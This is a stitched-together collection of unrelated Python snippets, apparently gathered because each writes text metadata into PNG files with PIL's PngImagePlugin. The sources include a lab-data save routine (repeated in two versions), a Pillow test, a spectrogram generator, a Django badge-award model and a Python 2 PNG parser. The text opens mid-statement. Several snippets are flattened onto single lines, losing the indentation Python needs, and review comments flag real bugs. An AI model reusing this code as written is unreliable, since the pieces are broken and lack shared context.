                      ''.format(filepath))

    # create filelabel if none has been passed
    if filelabel is None:
        filelabel = module_name
    if self.active_poi_name != '':
        filelabel = self.active_poi_name.replace(' ', '_') + '_' + filelabel

    # TODO: change default file naming, the time stamp is useless since now
    # it's stored in the data attributes
    if filename is None:
        filename = timestamp.strftime('%Y%m%d-%H%M-%S' + '_' + filelabel + '.h5')

    with h5py.File(os.path.join(filepath, filename), 'w') as h5file:
        for dset_name, data in data_dict.items():
            # FIX: non-array entries previously fell through to the
            # dset.attrs assignment with a stale or undefined `dset`;
            # skip them explicitly instead.
            if not isinstance(data, (list, np.ndarray)):
                self.log.info(
                    "The data you passed for {} are not an array, the "
                    "corresponding dataset will not be created.".format(dset_name))
                continue

            # FIX: plain lists have no .shape/.dtype although the docstring
            # promises list support; coerce to ndarray first.
            arr = np.asarray(data)
            dset = h5file.create_dataset(dset_name,
                                         shape=arr.shape,
                                         dtype=arr.dtype,
                                         data=arr)
            dset.attrs['timestamp'] = timestamp.strftime('%Y-%m-%d, %H:%M:%S')

            if (attributes is not None) and (dset_name in attributes):
                if not isinstance(attributes[dset_name], (dict, OrderedDict)):
                    self.log.info(
                        "The attributes need to be a dictionary, the saving "
                        "of the attributes of {} has been aborted".format(dset_name))
                else:
                    # FIX: iterate the attributes of THIS dataset, not the
                    # whole per-dataset mapping.
                    for attr_name, attr in attributes[dset_name].items():
                        dset.attrs[attr_name] = attr

    if plotfig is not None:
        # create Metadata for the saved thumbnail figure
        metadata = dict()
        metadata['Title'] = 'Image produced by qudi: ' + module_name
        metadata['Author'] = 'qudi - Software Suite'
        metadata['Subject'] = 'Find more information on: https://github.com/Ulm-IQO/qudi'
        metadata['Keywords'] = ('Python 3, Qt, experiment control, automation, '
                                'measurement, software, framework, modular')
        metadata['Producer'] = 'qudi - Software Suite'
        # timestamp is guaranteed non-None here (defaulted at the top), so
        # the old dead fallback to the `time` module was removed.
        metadata['CreationDate'] = timestamp
        metadata['ModDate'] = timestamp

        # NOTE(review): [:-4] assumes a 4-character extension but the default
        # filename ends in '.h5' — confirm intended stem handling.
        if self.save_pdf:
            # determine the PDF-Filename
            fig_fname_vector = os.path.join(filepath, filename)[:-4] + '_fig.pdf'
            # The with statement makes sure that the PdfPages object is
            # closed properly at the end of the block, even if an Exception
            # occurs.
            with PdfPages(fig_fname_vector) as pdf:
                pdf.savefig(plotfig, bbox_inches='tight', pad_inches=0.05)
                # We can also set the file's metadata via the PdfPages object:
                pdf_metadata = pdf.infodict()
                for x in metadata:
                    pdf_metadata[x] = metadata[x]

        if self.save_png:
            # determine the PNG-Filename and save the plain PNG
            fig_fname_image = os.path.join(filepath, filename)[:-4] + '_fig.png'
            plotfig.savefig(fig_fname_image, bbox_inches='tight', pad_inches=0.05)

            # Use Pillow (a fork of PIL) to attach metadata to the PNG
            png_image = Image.open(fig_fname_image)
            png_metadata = PngImagePlugin.PngInfo()
            # PIL can only handle strings, so convert our times first
            metadata['CreationDate'] = metadata['CreationDate'].strftime('%Y%m%d-%H%M-%S')
            metadata['ModDate'] = metadata['ModDate'].strftime('%Y%m%d-%H%M-%S')
            for x in metadata:
                # make sure every value of the metadata is a string
                if not isinstance(metadata[x], str):
                    metadata[x] = str(metadata[x])
                # add the metadata to the picture
                png_metadata.add_text(x, metadata[x])
            # save the picture again, this time including the metadata
            png_image.save(fig_fname_image, "png", pnginfo=png_metadata)

        # close matplotlib figure
        plt.close(plotfig)

    self.log.debug('Time needed to save data: {0:.2f}s'.format(time.time() - start_time))
def test_getchunks(self): im = hopper() chunks = PngImagePlugin.getchunks(im) assert len(chunks) == 3
def polish(filename, w, h, hash="", viewhash=""): print(" Polishing...") try: img = Image.open(filename) img = img.convert("RGBA") pixdata = img.load() # Read top left pixel color - not robust to zoomed in images # tlc = pixdata[0,0] # init clipping bounds x1 = img.size[0] x2 = 0 y1 = img.size[1] y2 = 0 # Set background to white and transparent for y in xrange(img.size[1]): solidx = 0 solidy = 0 for x in xrange(img.size[0]): if pixdata[x, y] == bkc: pixdata[x, y] = (255, 255, 255, 0 if PolishTransparentBackground else 255) else: if solidx == 0 and x < x1: x1 = x if solidy == 0 and y < y1: y1 = y solidx = x solidy = y if solidx > x2: x2 = solidx if solidy > y2: y2 = solidy x2 += 2 y2 += 2 # downsample (half the res) img = img.resize((w, h), Image.ANTIALIAS) # crop if (x1 < x2 and y1 < y2 and PolishCrop): img = img.crop((x1/2,y1/2,x2/2,y2/2)) # add hash to meta data meta = PngImagePlugin.PngInfo() # copy metadata into new object #for k,v in im.info.iteritems(): # if k in reserved: continue meta.add_text("csghash", hash, 0) meta.add_text("viewhash", viewhash, 0) # Save it img.save(filename, "PNG", pnginfo=meta) img.close() except: print(" Exception error", sys.exc_info()[0])
def save_data(self, data, filepath=None, parameters=None, filename=None,
              filelabel=None, timestamp=None, filetype='text', fmt='%.15e',
              delimiter='\t', plotfig=None):
    """ General save routine for data.

    @param dictionary data: Dictionary containing the data to be saved. The
                            keys should be strings containing the data
                            header/description. The corresponding items are
                            one or more 1D arrays or one 2D array containing
                            the data (list or numpy.ndarray). Example:

                                data = {'Frequency (MHz)': [1,2,4,5,6]}
                                data = {'Frequency': [1, 2, 4], 'Counts': [234, 894, 743, 423]}
                                data = {'Frequency (MHz),Counts':[[1,234], [2,894],...[30,504]]}

    @param string filepath: optional, the path to the directory, where the
                            data will be saved. If the specified path does
                            not exist yet, the saving routine will try to
                            create it. If no path is passed (default
                            filepath=None) the saving routine will create a
                            directory by the name of the calling module
                            inside the daily data directory. If no calling
                            module can be inferred and/or the requested path
                            can not be created the data will be saved in a
                            subfolder of the daily data directory called
                            UNSPECIFIED

    @param dictionary parameters: optional, a dictionary with all parameters
                                  you want to save in the header of the
                                  created file.

    @param string filename: optional, if you really want to fix your own
                            filename. If passed, the whole file will have
                            the name <filename>. If nothing is specified the
                            save logic will generate a filename either based
                            on the module name from which this method was
                            called, or it will use the passed filelabel if
                            that is specified. You also need to specify the
                            ending of the filename!

    @param string filelabel: optional, if filelabel is set and no filename
                             was specified, the savelogic will create a name
                             which looks like
                             YYYY-MM-DD_HHh-MMm-SSs_<filelabel>.dat
                             The timestamp will be created at runtime if no
                             user defined timestamp was passed.

    @param datetime timestamp: optional, a datetime.datetime object. You can
                               create this object with
                               datetime.datetime.now() in the calling module
                               if you want to fix the timestamp for the
                               filename. Be careful when passing a filename
                               and a timestamp, because then the timestamp
                               will be ignored.

    @param string filetype: optional, the file format the data should be
                            saved in. Valid inputs are 'text', 'xml' and
                            'npz'. Default is 'text'.

    @param string or list of strings fmt: optional, format specifier for
                                          saved data. See python
                                          documentation for "Format
                                          Specification Mini-Language". If
                                          you want for example save a float
                                          in scientific notation with 6
                                          decimals this would look like
                                          '%.6e'. For saving integers you
                                          could use '%d', '%s' for strings.
                                          The default is '%.15e' for numbers
                                          and '%s' for str. If
                                          len(data) > 1 you should pass a
                                          list of format specifiers; one for
                                          each item in the data dict. If
                                          only one specifier is passed but
                                          the data arrays have different
                                          data types this can lead to
                                          strange behaviour or failure to
                                          save right away.

    @param string delimiter: optional, insert here the delimiter, like '\n'
                             for new line, '\t' for tab, ',' for a comma
                             etc.

    1D data
    =======
    1D data should be passed in a dictionary where the data trace should be
    assigned to one identifier like

        {'<identifier>':[list of values]}
        {'Numbers of counts':[1.4, 4.2, 5, 2.0, 5.9 , ... , 9.5, 6.4]}

    You can also pass as much 1D arrays as you want:

        {'Frequency (MHz)':list1, 'signal':list2, 'correlations': list3, ...}

    2D data
    =======
    2D data should be passed in a dictionary where the matrix like data
    should be assigned to one identifier like

        {'<identifier>':[[1,2,3],[4,5,6],[7,8,9]]}

    which will result in:
        <identifier>
        1   2   3
        4   5   6
        7   8   9

    YOU ARE RESPONSIBLE FOR THE IDENTIFIER! DO NOT FORGET THE UNITS FOR THE
    SAVED TIME TRACE/MATRIX.
    """
    start_time = time.time()
    # Create timestamp if none is present
    if timestamp is None:
        timestamp = datetime.datetime.now()

    # Try to cast data array into numpy.ndarray if it is not already one
    # Also collect information on arrays in the process and do sanity checks
    found_1d = False
    found_2d = False
    multiple_dtypes = False
    arr_length = []
    arr_dtype = []
    max_row_num = 0   # total number of columns across all arrays
    max_line_num = 0  # length of the longest array (number of rows)
    for keyname in data:
        # Cast into numpy array
        if not isinstance(data[keyname], np.ndarray):
            try:
                data[keyname] = np.array(data[keyname])
            except:
                self.log.error(
                    'Casting data array of type "{0}" into numpy.ndarray failed. '
                    'Could not save data.'.format(type(data[keyname])))
                return -1

        # determine dimensions
        if data[keyname].ndim < 3:
            length = data[keyname].shape[0]
            arr_length.append(length)
            if length > max_line_num:
                max_line_num = length
            if data[keyname].ndim == 2:
                found_2d = True
                width = data[keyname].shape[1]
                if max_row_num < width:
                    max_row_num = width
            else:
                found_1d = True
                max_row_num += 1  # each 1D array contributes one column
        else:
            self.log.error(
                'Found data array with dimension >2. Unable to save data.')
            return -1

        # determine array data types (flag when they differ between arrays)
        if len(arr_dtype) > 0:
            if arr_dtype[-1] != data[keyname].dtype:
                multiple_dtypes = True
        arr_dtype.append(data[keyname].dtype)

    # Raise error if data contains a mixture of 1D and 2D arrays
    if found_2d and found_1d:
        self.log.error(
            'Passed data dictionary contains 1D AND 2D arrays. This is not allowed. '
            'Either fit all data arrays into a single 2D array or pass multiple 1D '
            'arrays only. Saving data failed!')
        return -1

    # try to trace back the functioncall to the class which was calling it.
    try:
        frm = inspect.stack()[1]
        # this will get the object, which called the save_data function.
        mod = inspect.getmodule(frm[0])
        # that will extract the name of the class.
        module_name = mod.__name__.split('.')[-1]
    except:
        # Sometimes it is not possible to get the object which called the
        # save_data function (such as when calling this from the console).
        module_name = 'UNSPECIFIED'

    # determine proper file path
    if filepath is None:
        filepath = self.get_path_for_module(module_name)
    elif not os.path.exists(filepath):
        os.makedirs(filepath)
        self.log.info('Custom filepath does not exist. Created directory "{0}"'
                      ''.format(filepath))

    # determine proper unique filename to save if none has been passed
    if filename is None:
        filename = self.get_filename(filelabel, timestamp)

    # Check format specifier.
    if not isinstance(fmt, str) and len(fmt) != len(data):
        self.log.error(
            'Length of list of format specifiers and number of data items differs. '
            'Saving not possible. Please pass exactly as many format specifiers as '
            'data arrays.')
        return -1

    # Create header string for the file
    header = 'Saved Data from the class {0} on {1}.\n' \
             ''.format(module_name, timestamp.strftime('%d.%m.%Y at %Hh%Mm%Ss'))
    # NOTE(review): `!= None` should idiomatically be `is not None` (here
    # and for self.notes below).
    if self._file_tag != None:
        header += '{}\n'.format(self._file_tag)
    header += '\nParameters:\n===========\n\n'
    # Include the active POI name (if not empty) as a parameter in the header
    if self.active_poi_name != '':
        header += 'Measured at POI: {0}\n'.format(self.active_poi_name)
    if self.notes != None:
        header += 'Notes: {}\n'.format(self.notes)

    # add the parameters if specified:
    if parameters is not None:
        # check whether the format for the parameters have a dict type:
        if isinstance(parameters, dict):
            if isinstance(self._additional_parameters, dict):
                # caller parameters override the logic's additional ones
                parameters = {**self._additional_parameters, **parameters}
            for entry, param in parameters.items():
                if isinstance(param, float):
                    header += '{0}: {1:.16e}\n'.format(entry, param)
                else:
                    header += '{0}: {1}\n'.format(entry, param)
        # make a hardcore string conversion and try to save the parameters directly:
        else:
            self.log.error('The parameters are not passed as a dictionary! The SaveLogic will '
                           'try to save the parameters nevertheless.')
            header += 'not specified parameters: {0}\n'.format(parameters)
    header += '\nData:\n=====\n'

    # write data to file
    # FIXME: Implement other file formats
    # write to textfile
    if filetype == 'text':
        # Reshape data if multiple 1D arrays have been passed to this method.
        # If a 2D array has been passed, reformat the specifier
        if len(data) != 1:
            identifier_str = ''
            if multiple_dtypes:
                # mixed dtypes: build a structured (record) array with one
                # named field per input array
                field_dtypes = list(
                    zip(['f{0:d}'.format(i) for i in range(len(arr_dtype))],
                        arr_dtype))
                new_array = np.empty(max_line_num, dtype=field_dtypes)
                for i, keyname in enumerate(data):
                    identifier_str += keyname + delimiter
                    field = 'f{0:d}'.format(i)
                    length = data[keyname].size
                    new_array[field][:length] = data[keyname]
                    # pad shorter arrays with NaN (or the string 'nan')
                    if length < max_line_num:
                        if isinstance(data[keyname][0], str):
                            new_array[field][length:] = 'nan'
                        else:
                            new_array[field][length:] = np.nan
            else:
                # uniform dtype: stack the 1D arrays as columns
                new_array = np.empty([max_line_num, max_row_num], arr_dtype[0])
                for i, keyname in enumerate(data):
                    identifier_str += keyname + delimiter
                    length = data[keyname].size
                    new_array[:length, i] = data[keyname]
                    if length < max_line_num:
                        if isinstance(data[keyname][0], str):
                            new_array[length:, i] = 'nan'
                        else:
                            new_array[length:, i] = np.nan
            # discard old data array and use new one
            data = {identifier_str: new_array}
        elif found_2d:
            # single 2D array: turn the comma-separated key into a
            # delimiter-separated column header
            keyname = list(data.keys())[0]
            identifier_str = keyname.replace(', ', delimiter).replace(
                ',', delimiter)
            data[identifier_str] = data.pop(keyname)
        else:
            identifier_str = list(data)[0]
        header += list(data)[0]
        self.save_array_as_text(data=data[identifier_str],
                                filename=filename,
                                filepath=filepath,
                                fmt=fmt,
                                header=header,
                                delimiter=delimiter,
                                comments='#',
                                append=False)
    # write npz file and save parameters in textfile
    elif filetype == 'npz':
        header += str(list(data.keys()))[1:-1]
        np.savez_compressed(filepath + '/' + filename[:-4], **data)
        self.save_array_as_text(data=[],
                                filename=filename[:-4] + '_params.dat',
                                filepath=filepath,
                                fmt=fmt,
                                header=header,
                                delimiter=delimiter,
                                comments='#',
                                append=False)
    else:
        # NOTE(review): `identifier_str` is only bound by the 'text' branch,
        # so this fallback raises NameError for unknown filetypes — confirm
        # intended behavior.
        self.log.error(
            'Only saving of data as textfile and npz-file is implemented. Filetype "{0}" is not '
            'supported yet. Saving as textfile.'.format(filetype))
        self.save_array_as_text(data=data[identifier_str],
                                filename=filename,
                                filepath=filepath,
                                fmt=fmt,
                                header=header,
                                delimiter=delimiter,
                                comments='#',
                                append=False)

    #--------------------------------------------------------------------------------------------
    # Save thumbnail figure of plot
    if plotfig is not None:
        # create Metadata
        metadata = dict()
        metadata['Title'] = 'Image produced by qudi: ' + module_name
        metadata['Author'] = 'qudi - Software Suite'
        metadata['Subject'] = 'Find more information on: https://github.com/Ulm-IQO/qudi'
        metadata['Keywords'] = 'Python 3, Qt, experiment control, automation, measurement, software, framework, modular'
        metadata['Producer'] = 'qudi - Software Suite'
        # NOTE(review): timestamp is always non-None here (defaulted above),
        # so the else branch — which stores the `time` MODULE — is dead code.
        if timestamp is not None:
            metadata['CreationDate'] = timestamp
            metadata['ModDate'] = timestamp
        else:
            metadata['CreationDate'] = time
            metadata['ModDate'] = time

        if self.save_pdf:
            # determine the PDF-Filename
            fig_fname_vector = os.path.join(filepath, filename)[:-4] + '_fig.pdf'

            # Create the PdfPages object to which we will save the pages:
            # The with statement makes sure that the PdfPages object is
            # closed properly at the end of the block, even if an Exception
            # occurs.
            with PdfPages(fig_fname_vector) as pdf:
                pdf.savefig(plotfig, bbox_inches='tight', pad_inches=0.05)

                # We can also set the file's metadata via the PdfPages object:
                pdf_metadata = pdf.infodict()
                for x in metadata:
                    pdf_metadata[x] = metadata[x]

        if self.save_png:
            # determine the PNG-Filename and save the plain PNG
            fig_fname_image = os.path.join(filepath, filename)[:-4] + '_fig.png'
            plotfig.savefig(fig_fname_image, bbox_inches='tight', pad_inches=0.05)

            # Use Pillow (an fork for PIL) to attach metadata to the PNG
            png_image = Image.open(fig_fname_image)
            png_metadata = PngImagePlugin.PngInfo()

            # PIL can only handle Strings, so let's convert our times
            metadata['CreationDate'] = metadata['CreationDate'].strftime('%Y%m%d-%H%M-%S')
            metadata['ModDate'] = metadata['ModDate'].strftime('%Y%m%d-%H%M-%S')

            for x in metadata:
                # make sure every value of the metadata is a string
                if not isinstance(metadata[x], str):
                    metadata[x] = str(metadata[x])
                # add the metadata to the picture
                png_metadata.add_text(x, metadata[x])

            # save the picture again, this time including the metadata
            png_image.save(fig_fname_image, "png", pnginfo=png_metadata)

        # close matplotlib figure
        plt.close(plotfig)
    self.log.debug('Time needed to save data: {0:.2f}s'.format(time.time() - start_time))
def run(self):
    """Worker entry point: render up to 50 new spectrogram PNGs for this
    thread's category and embed generation metadata into each PNG.

    For every ``*.wav`` entry in ``self.trackswav`` (read from
    ``self.my_json['dataset_wav_path']``), a spectrogram is drawn with
    matplotlib (``pcolormesh`` when ``self.colormesh`` is truthy, otherwise
    ``specgram``), saved under ``self.my_json['dataset_image_path']``, then
    reopened with PIL and re-saved with a tEXt metadata block (duration,
    category, FFT settings).  Files whose PNG already exists are skipped.
    Every failure is reported on stdout and processing continues with the
    next file.

    NOTE(review): paths are joined with hard-coded "\\" separators, so this
    is Windows-only as written; ``os.path.join`` would be portable.
    NOTE(review): the bare ``except:`` clauses swallow everything including
    KeyboardInterrupt — narrowing them would be safer, but is a behavior
    change left to a follow-up.
    """
    print("Running the Thread : ", self.name)
    # Number of spectrograms generated this run; the thread stops at 50.
    cmpt = 0
    for i, item in enumerate(self.trackswav):
        if (cmpt >= 50):
            break
        # Crude extension check: only files ending in "wav" are processed.
        if (item[-3:] == "wav"):
            # Skip work if the target PNG already exists on disk.
            if not os.path.exists(self.my_json["dataset_image_path"] +
                                  "\\" + self.category + "\\" +
                                  item.replace(".wav", ".png")):
                try:
                    # Outer try: guards WAV decoding.
                    sample_rate, samples = wavfile.read(
                        str(self.my_json['dataset_wav_path'] + '\\' +
                            self.category + '\\' + item))
                    # samples, sample_rate = lr.load(str(self.my_json['dataset_wav_path']+'\\'+self.category+'\\'+item), mono=True)
                    duration_seconds = len(
                        samples) / sample_rate  # 44100 Hz -> 30s.
                    nfft = 2048  # CARE ABOUT THE RESOLUTION -> loss of precision.
                    basis = None  # NOTE(review): unused; kept for token fidelity.
                    noverlap = 128  # number of frequency level. default = 128
                    spect_Fs = sample_rate / 2
                    try:
                        # Middle try: guards figure creation / plotting.
                        # Frameless 2x2 inch figure so the PNG is only the
                        # spectrogram pixels.
                        fig = plt.figure(
                            frameon=False, figsize=(2, 2)
                        )  #, figsize=(self.height/self.dpi, self.width/self.dpi), dpi=self.dpi)
                        ax = plt.axes()
                        plt.ioff()  # keep matplotlib non-interactive in the worker thread
                        if (self.colormesh):
                            f, t, Sxx = signal.spectrogram(
                                samples, sample_rate,
                                return_onesided=False)
                            plt.pcolormesh(t, np.fft.fftshift(f),
                                           np.fft.fftshift(Sxx, axes=0))
                        else:
                            plt.specgram(samples,
                                         NFFT=nfft,
                                         noverlap=noverlap,
                                         Fs=spect_Fs,
                                         Fc=0,
                                         cmap='gray_r',
                                         sides='default',
                                         mode='default',
                                         scale='dB')
                        try:
                            # Inner try: guards legend handling + savefig.
                            if (self.legend):
                                # Human-readable variant: colorbar + labels.
                                plt.colorbar(None, use_gridspec=True)
                                plt.title('Spectrogram of ' + item)
                                plt.ylabel('Frequency [Hz]')
                                plt.xlabel('Time [sec]')
                            else:
                                # Dataset variant: hide all axes so only the
                                # raw spectrogram pixels are exported.
                                frame = plt.gca()
                                frame.axes.get_xaxis().set_visible(False)
                                frame.axes.get_yaxis().set_visible(False)
                                ax.set_axis_off()
                            fig.savefig(
                                str(self.my_json["dataset_image_path"] +
                                    "\\" + self.category + "\\" +
                                    item.replace("wav", "png")),
                                frameon="false",
                                bbox_inches='tight',
                                transparent=True,
                                pad_inches=0.0)
                            print(self.name, " Index ", i,
                                  ". The spectrogram : ",
                                  item.replace('wav', 'png'),
                                  " was created.")
                            try:
                                # Reopen the freshly written PNG to attach
                                # tEXt metadata with PIL.
                                im = Image.open(
                                    str(self.my_json["dataset_image_path"]
                                        + "\\" + self.category + "\\" +
                                        item.replace("wav", "png")))
                                try:
                                    meta = PngImagePlugin.PngInfo()
                                    # All values must be strings for tEXt.
                                    my_meta = {
                                        "length_secs":
                                        str(duration_seconds),
                                        "category_shaped":
                                        str(self.corresponding_cat_array),
                                        "category": self.category,
                                        "overlap": str(noverlap),
                                        "nfft": str(nfft),
                                        "Fs": str(spect_Fs),
                                        'Frequency': str(sample_rate)
                                    }
                                    for x in my_meta:
                                        meta.add_text(x, my_meta[x])
                                    # Re-save in place, now with metadata.
                                    im.save(
                                        str(self.
                                            my_json["dataset_image_path"] +
                                            "\\" + self.category + "\\" +
                                            item.replace("wav", "png")),
                                        "png",
                                        pnginfo=meta)
                                except Exception as inst:
                                    print(inst)
                                    print(
                                        self.name, " Index ", i,
                                        ". Error creating the metadatas.")
                            except Exception as inst:
                                print("\nException : ", inst)
                                print(
                                    self.name, " Index ", i,
                                    ". The png image representing the spectrogram can't be opened."
                                )
                        except:
                            print(
                                self.name, " Index ", i,
                                ". The spectrogram : ",
                                item.replace('wav', 'png'),
                                " can't be created. Error creating/hiding the legend of the spectrogram."
                            )
                        # Close the current figure so long runs don't leak
                        # matplotlib state.
                        plt.close()
                    except Exception as inst:
                        print("Exception : ", inst)
                        print(
                            self.name, " Index ", i,
                            ". The spectrogram : ",
                            item.replace('wav', 'png'),
                            " can't be created. Error creating the spectogram."
                        )
                    # NOTE(review): this increments even when the plotting
                    # try above failed, so failed files still count toward
                    # the 50-file budget — confirm whether that is intended.
                    cmpt += 1
                except:
                    print(
                        self.name, " Index ", i, ". The spectrogram : ",
                        item.replace('wav', 'png'),
                        " can't be created. Error reading the data from the wav file and extracting the frames."
                    )
            else:
                print(self.name, " Index ", i, ". The spectrogram : ",
                      item.replace('wav', 'png'), " already exists.")
        else:
            print(self.name, " : Error exporting creating the png. the ",
                  item, " isn't at the good format.\n")
    print("The thread : ", self.name, " is terminated.")
def rt_text(value):
    """Round-trip a single text chunk through PNG save/load and verify
    that the value survives unchanged in the reloaded image's info dict."""
    source = Image.new("RGB", (32, 32))
    png_info = PngImagePlugin.PngInfo()
    png_info.add_text("Text", value)
    reloaded = roundtrip(source, pnginfo=png_info)
    assert reloaded.info == {"Text": value}
'00000005.jpg', '00000006.jpg', '00000007.jpg', ] bitmaps = [] for i in images: bitmaps.append(Image.open(i)) # 创建目标图片 sample = bitmaps[0] width = sample.width height = sample.height result = Image.new('RGB', (width, height * len(bitmaps))) print(f'Width: {width}') print(f'Height: {height} x {len(bitmaps)}\n') # 循环复制像素 for y in range(0, height): print(f'copying {y+1}/{height}', end='\r') for x in range(0, width): for i in range(0, len(bitmaps)): result.putpixel((x, 7 * y + i), bitmaps[i].getpixel((x, y))) print('Finish!') # 写入exif数据 meta = PngImagePlugin.PngInfo() meta.add_text('Frames', str(len(bitmaps))) # result.save('result.png',pnginfo=meta) result.convert('P').save('result.png', pnginfo=meta)
class Award(models.Model):
    """Representation of a badge awarded to a user.

    Saving a new Award fires the will-be/was-awarded signals, bakes the
    hosted OBI assertion URL into a copy of the badge image, checks
    dependent badges' prerequisites, and clears any in-progress Progress
    rows for this user/badge pair.

    NOTE(review): Python 2 code (``__unicode__``, ``except IOError, e``,
    ``StringIO``) — do not modernize piecemeal.
    """

    # Unfiltered manager for the admin; the default manager may filter.
    admin_objects = models.Manager()
    objects = AwardManager()

    badge = models.ForeignKey(Badge)
    # Baked copy of the badge image with the OBI assertion embedded;
    # written by bake_obi_image() after save().
    image = models.ImageField(blank=True, null=True,
                              storage=BADGE_UPLOADS_FS,
                              upload_to=mk_upload_to('image', 'png'))
    claim_code = models.CharField(max_length=32, blank=True,
                                  default='', unique=False, db_index=True,
                                  help_text="Code used to claim this award")
    user = models.ForeignKey(User, related_name="award_user")
    # Awarding user; null/blank for system-issued awards.
    creator = models.ForeignKey(User, related_name="award_creator",
                                blank=True, null=True)
    hidden = models.BooleanField(default=False)
    created = models.DateTimeField(auto_now_add=True, blank=False)
    modified = models.DateTimeField(auto_now=True, blank=False)

    # Shared permission-lookup helper bound as a method.
    get_permissions_for = get_permissions_for

    class Meta:
        ordering = ['-modified', '-created']

    def __unicode__(self):
        """Human-readable label, e.g. 'Award of <badge> to <user> by <creator>'."""
        by = self.creator and (u' by %s' % self.creator) or u''
        return u'Award of %s to %s%s' % (self.badge, self.user, by)

    @models.permalink
    def get_absolute_url(self):
        return ('badger.views.award_detail', (self.badge.slug, self.pk))

    def get_upload_meta(self):
        """Return (base_dir, slug) used to build upload paths for this award.

        Shards by the first two characters of the username to keep any one
        directory from growing too large.
        """
        u = self.user.username
        return ("award/%s/%s/%s" % (u[0], u[1], u), self.badge.slug)

    def allows_detail_by(self, user):
        # TODO: Need some logic here, someday.
        return True

    def save(self, *args, **kwargs):
        """Persist the award, firing signals and baking the image.

        Raises BadgeAlreadyAwardedException when re-awarding a unique badge.
        """
        # Signals and some bits of logic only happen on a new award.
        is_new = not self.pk

        if is_new:
            # Bail if this is an attempt to double-award a unique badge
            if self.badge.unique and self.badge.is_awarded_to(self.user):
                raise BadgeAlreadyAwardedException()

            # Only fire will-be-awarded signal on a new award.
            badge_will_be_awarded.send(sender=self.__class__, award=self)

        super(Award, self).save(*args, **kwargs)

        # Called after super.save(), so we have some auto-gen fields like pk
        # and created
        self.bake_obi_image()

        if is_new:
            # Only fire was-awarded signal on a new award.
            badge_was_awarded.send(sender=self.__class__, award=self)

            # Since this badge was just awarded, check the prerequisites on all
            # badges that count this as one.
            for dep_badge in self.badge.badge_set.all():
                dep_badge.check_prerequisites(self.user, self.badge, self)

        # Reset any progress for this user & badge upon award.
        Progress.objects.filter(user=self.user, badge=self.badge).delete()

    def as_obi_assertion(self, request=None):
        """Build the OBI (Open Badges) assertion dict for this award.

        The recipient email is hashed (sha256, salted with an md5 of the
        badge/award pks) so the assertion does not expose the address.
        """
        badge_data = self.badge.as_obi_serialization(request)

        if request:
            base_url = request.build_absolute_uri('/')[:-1]
        else:
            base_url = 'http://%s' % (Site.objects.get_current().domain, )

        # If this award has a creator (ie. not system-issued), tweak the issuer
        # data to reflect award creator.
        # TODO: Is this actually a good idea? Or should issuer be site-wide
        if self.creator:
            badge_data['issuer'] = {
                # TODO: Get from user profile instead?
                "origin": base_url,
                "name": self.creator.username,
                "contact": self.creator.email
            }

        # see: https://github.com/brianlovesdata/openbadges/wiki/Assertions
        # TODO: This salt is stable, and the badge.pk is generally not
        # disclosed anywhere, but is it obscured enough?
        hash_salt = (hashlib.md5('%s-%s' %
                                 (self.badge.pk, self.pk)).hexdigest())
        recipient_text = '%s%s' % (self.user.email, hash_salt)
        recipient_hash = ('sha256$%s' %
                          hashlib.sha256(recipient_text).hexdigest())
        assertion = {
            "recipient": recipient_hash,
            "salt": hash_salt,
            "evidence": urljoin(base_url, self.get_absolute_url()),
            # TODO: implement award expiration
            # "expires": self.expires.strftime('%s'),
            "issued_on": self.created.strftime('%s'),
            "badge": badge_data
        }
        return assertion

    def bake_obi_image(self, request=None):
        """Bake the OBI JSON badge award assertion into a copy of the original
        badge's image, if one exists.

        Writes the hosted assertion URL into an 'openbadges' tEXt chunk of
        the PNG and replaces self.image with the baked copy.  Returns False
        if the source image cannot be parsed, True on success.
        """
        if request:
            base_url = request.build_absolute_uri('/')
        else:
            base_url = 'http://%s' % (Site.objects.get_current().domain, )

        if self.badge.image:
            # Make a duplicate of the badge image
            self.badge.image.open()
            img_copy_fh = StringIO(self.badge.image.file.read())
        else:
            # Make a copy of the default badge image
            img_copy_fh = StringIO(open(DEFAULT_BADGE_IMAGE, 'rb').read())

        try:
            # Try processing the image copy, bail if the image is bad.
            img = Image.open(img_copy_fh)
        except IOError, e:
            return False

        # Here's where the baking gets done. JSON representation of the OBI
        # assertion gets written into the "openbadges" metadata field
        # see: http://blog.client9.com/2007/08/python-pil-and-png-metadata-take-2.html
        # see: https://github.com/mozilla/openbadges/blob/development/lib/baker.js
        # see: https://github.com/mozilla/openbadges/blob/development/controllers/baker.js
        from PIL import PngImagePlugin
        meta = PngImagePlugin.PngInfo()

        # TODO: Will need this, if we stop doing hosted assertions
        # assertion = self.as_obi_assertion(request)
        # meta.add_text('openbadges', json.dumps(assertion))

        hosted_assertion_url = '%s%s' % (base_url, reverse(
            'badger.award_detail_json', args=(self.badge.slug, self.id)))
        meta.add_text('openbadges', hosted_assertion_url)

        # And, finally save out the baked image.
        new_img = StringIO()
        img.save(new_img, "PNG", pnginfo=meta)
        img_data = new_img.getvalue()
        name_before = self.image.name
        # Empty name: let upload_to generate the new filename.
        self.image.save('', ContentFile(img_data), False)
        if (self.image.storage.exists(name_before)):
            self.image.storage.delete(name_before)

        # Update the image field with the new image name
        # NOTE: Can't do a full save(), because this gets called in save()
        Award.objects.filter(pk=self.pk).update(image=self.image)

        return True
# Feed the PNG byte stream to the incremental parser in fixed-size chunks.
# NOTE(review): 629 bytes looks arbitrary — presumably chosen to force chunk
# boundaries mid-segment while experimenting; confirm before relying on it.
while True:
    s = fp.read(629)
    # NOTE(review): prints before the EOF check, so the final empty read is
    # echoed too.
    print s
    if not s:
        break
    p.feed(s)

# Finalize incremental parsing and write the decoded image back out.
im = p.close()

im.save("o2.png")
#im.show()

# Enumerate the raw PNG chunks from the file handle.
# NOTE(review): fp was read to EOF by the loop above — presumably
# png.getchunks rewinds/reopens it; verify against that helper.
# chunky = png.PngStream(im)
chunks_are_us = png.getchunks(fp)

#for item in chunks_are_us:
    #print item[0]

# Observed output of the commented loop above:
#this returns these:
# IHDR (required)
# IDAT (image data chunk 1)
# IDAT (image data chunk 2)
# IEND (required)
#no itXt chunk or other metadata

#this works but is not informative
# for k,v in im.info.iteritems():
#     print k,v